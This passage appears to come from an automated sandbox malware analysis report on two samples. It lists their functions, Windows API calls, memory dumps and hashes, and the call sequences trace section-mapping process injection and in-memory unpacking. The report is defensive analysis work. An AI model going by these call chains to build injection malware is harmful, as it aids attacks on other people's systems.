NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02C7003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02C7024D

Strings

cess, xrefs: 02C7018D
kernel32.dll, xrefs: 02C7008F, 02C70095

Memory Dump Source

Source File: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c70000_wehrbbi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 2578528d95e296f0f130f97727f7e8a4b4dd266050c786927ed7d4256d07e6d4
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 97526975A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA85DF14

Function 004157A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041587F
GetProcAddress.KERNEL32(00000000,00419CC8), ref: 004158BC
VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 004158DB

Strings

, xrefs: 004157E5

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

Function 02D2A68F Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D2A6B7
Module32First.KERNEL32(00000000,00000224), ref: 02D2A6D7

Memory Dump Source

Source File: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d27000_wehrbbi.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: b1710d64503777c5cb7bb022b527b00d4d1a423ded57817b5f3bc708318da196
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 34F09632200B216FD7203BF5AD8CB6F76E9EF5962DF100569E652926C0DB70EC498A61

Function 02C70E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02C70223,?,?), ref: 02C70E19
SetErrorMode.KERNELBASE(00000000,?,?,02C70223,?,?), ref: 02C70E1E

Memory Dump Source

Source File: 00000005.00000002.2011202402.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2c70000_wehrbbi.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 25ef51fef4db5f7ec44bd9215f2815ef669215441d4b8e203029a7bdcddcdc72
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 05D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4047EA

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02D2A34E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D2A39F

Memory Dump Source

Source File: 00000005.00000002.2011394897.0000000002D27000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d27000_wehrbbi.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c8a229fe3a6202df0dddb45838507c162081b1c6d11cce800134d345b8960f75
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 8C113C79A00208EFDB01DF98CA85E98BBF5EF08751F058094F9489B361D371EA54EF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415747 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
Instruction ID: c7cd43120ea3207c5deb018b1e7389296927365904e67ce4adcfa047d92e18f4
Opcode Fuzzy Hash: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
Instruction Fuzzy Hash: 5BC02B70847282CFDB0A8B3094080E67EE0E6DF2427A40CEDC5C3C70A1DF16054EDB04

Function 00415770 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14

Non-executed Functions

Function 00415970 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 0041599D
WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 004159C1
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004159C9
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31

Strings

-, xrefs: 00415A3E

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 1791614364-2547889144
Opcode ID: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
Instruction ID: 5368a2a332436176f0270f6e324495ff1ab7250c8f8a8be8252ed3b816e40977
Opcode Fuzzy Hash: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
Instruction Fuzzy Hash: ED215B70A84308EBD750CF54DC86FD97BB4EB48761F1180A5FA49AA1C0CE7849C49B9A

Function 004159D9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31

Strings

-, xrefs: 00415A3E

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: CalendarInfoNameObjectOpenPathShort
String ID: -
API String ID: 2381848886-2547889144
Opcode ID: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
Instruction ID: 0db35e2b396c7aacfab1ac635380de6c7ec9f3e99e7bba80867eae6dc532c324
Opcode Fuzzy Hash: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
Instruction Fuzzy Hash: 3701F931A84204DADB708F50DC82BD97BB4FB44765F124195F6887F1C0CE7419C4DB89

Function 00415A70 Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415AA4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ABF
HeapDestroy.KERNEL32(00000000), ref: 00415ADE
GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415AE8

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
Instruction ID: 9b8f197d1e03404965dc2a48b96bd0ad9da3adac25fcf19301518012742e0a15
Opcode Fuzzy Hash: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
Instruction Fuzzy Hash: 5B01A270A80608EFE750EBA4EC85BDA77B8EB0C356F41403AF605D7280DE7459448F9A

Analysis Process: F421.exePID: 5180, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	15.7%
Signature Coverage:	0%
Total number of Nodes:	178
Total number of Limit Nodes:	7

Executed Functions

Function 004157A0 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 283
timefilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415892
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041589F
FindAtomW.KERNEL32(00000000), ref: 004158A6
GetConsoleMode.KERNEL32(00000000,00000000), ref: 004158AE
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004158C6
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 004158ED
MoveFileW.KERNEL32(00000000,00000000), ref: 004158F5
GetVersionExW.KERNEL32(?), ref: 00415902
DisconnectNamedPipe.KERNEL32(?), ref: 00415915
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 0041595A
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415969
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415972
PulseEvent.KERNEL32(00000000), ref: 00415982
SetCommState.KERNELBASE(00000000,00000000), ref: 004159A9
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 004159DA
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004159EB
GetComputerNameW.KERNEL32(?,?), ref: 004159FF
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415A3F
GetFileAttributesA.KERNEL32(00000000), ref: 00415A46
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415A4C
GetBinaryType.KERNEL32(004173D8,?), ref: 00415A5E
LoadLibraryA.KERNELBASE(004173E8), ref: 00415AD2
InterlockedDecrement.KERNEL32(?), ref: 00415B24
GetFileAttributesA.KERNEL32(004173F4), ref: 00415B57

Strings

}$, xrefs: 00415B2B
k`, xrefs: 00415B07

Memory Dump Source

Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_F421.jbxd

Similarity

API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
String ID: k`$}$
API String ID: 723190256-956986773
Opcode ID: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
Instruction ID: 3bf9ffe576a9fbcecb19cba34f73af1320b210f32c47b7a0ffd63e7749ed94fc
Opcode Fuzzy Hash: ffc5916c62f963363484ba31e8fd33b3cf82dd6137713916bc385b3e4e69cfa4
Instruction Fuzzy Hash: 17A1D071941624DFC724DB61DC48EDB7B79EF8D350F0180AAF609A7250DB385A81CFA9

Function 004014FB Relevance: 10.8, APIs: 7, Instructions: 316
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction ID: 8456862ab07ee4fd5df19115d19177d22808884b2e91bbb4bd05fd593ecc01b1
Opcode Fuzzy Hash: c0c0f7080bca9052c17eb5f435a0de39dc556564f0894fb09fbcd269735ed19c
Instruction Fuzzy Hash: CFA1E3B1604215BFDF218F95CC45FAB7BB8EF82710F14006BE942BB1E1D6399902DB5A

Function 004015FB Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction ID: eff60cd738278fe88036fd12be8a847ac689736a027776baabbfcbb81c570d02
Opcode Fuzzy Hash: 8aaa4946e75727fc09ad2f405e2a017ad71aadc6c477ed290025760324e3469e
Instruction Fuzzy Hash: 20512DB4900205BBEF208F91CC48FAFBBB8EF85B00F14416AF911BA2E5D7759945CB64

Function 00401613 Relevance: 10.7, APIs: 7, Instructions: 176
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040172C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,?,00000079), ref: 0040176D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_F421.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction ID: 5fe8c3412efddb1af6587580d34f391b5aa6f3f620f4969ff4058e4fba2aebcc
Opcode Fuzzy Hash: ad766b3969fddc35dc3ff1f72950dd3bc16db4ac8334f03efc3fd571d50c1c7d
Instruction Fuzzy Hash: 385129B5900245BBEF218F91CC48FEFBBB8EF86B00F144169F911AA2A5D7719905CB64

Function 00401606 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040170E

Memory Dump Source

Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

